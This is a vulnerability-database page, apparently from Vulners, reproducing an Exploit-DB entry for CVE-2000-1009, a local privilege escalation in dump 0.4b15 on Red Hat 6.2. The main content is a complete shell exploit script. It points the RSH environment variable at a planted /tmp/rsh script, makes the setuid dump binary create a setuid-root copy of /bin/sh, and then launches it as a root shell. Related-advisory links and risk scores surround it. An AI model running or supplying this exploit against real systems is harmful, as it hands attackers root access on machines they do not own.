Lucene search
+L

dump 0.4b15 - Local Privilege Escalation

🗓️ 19 Nov 2000 00:00:00Reported by matType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 53 Views

Local Privilege Escalation in dump 0.4b15; exploit script discovered by Mat.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2000-1009
29 Nov 200005:00
cve
cvelist
Cvelist
CVE-2000-1009
29 Nov 200005:00
cvelist
exploitdb
Exploit DB
dump 0.4b15 (RedHat 6.2) - Local Privilege Escalation
29 Nov 200000:00
exploitdb
euvd
EUVD
EUVD-2000-0996
7 Oct 202500:30
euvd
nvd
NVD
CVE-2000-1009
11 Dec 200005:00
nvd
cert
CERT
Linux dump uses environment variables insecurely, allowing for root compromise
21 Aug 200100:00
cert
#!/bin/sh

# Redhat 6.2 dump command executes external program
# with suid priviledge.
# Discovered by Mat <[email protected]>
# Written for and by a scriptkid Tasc ;P
# Remember, there's no cure for BSE

echo "dump-0.4b15 root exploit"
echo "Discovered by Mat <[email protected]>"
echo "-------------------------------------"
echo
DUMP=/sbin/dump
if [ ! -u $DUMP ]; then
  echo "$DUMP is NOT setuid on this system or does not exist at all!"
  echo
  exit 0
fi
export TAPE=iamlame:iamlame
export RSH=/tmp/rsh
cat >/tmp/rsh <<__eof__
#!/bin/sh
cp /bin/sh /tmp/sush
chmod 4755 /tmp/sush
}
__eof__
chmod 755 /tmp/rsh
/sbin/dump -0 /
echo
echo "Waiting for rootshell .... 5 seconds...."
sleep 5
/tmp/sush
id


# milw0rm.com [2000-11-19]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Mar 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.01146
53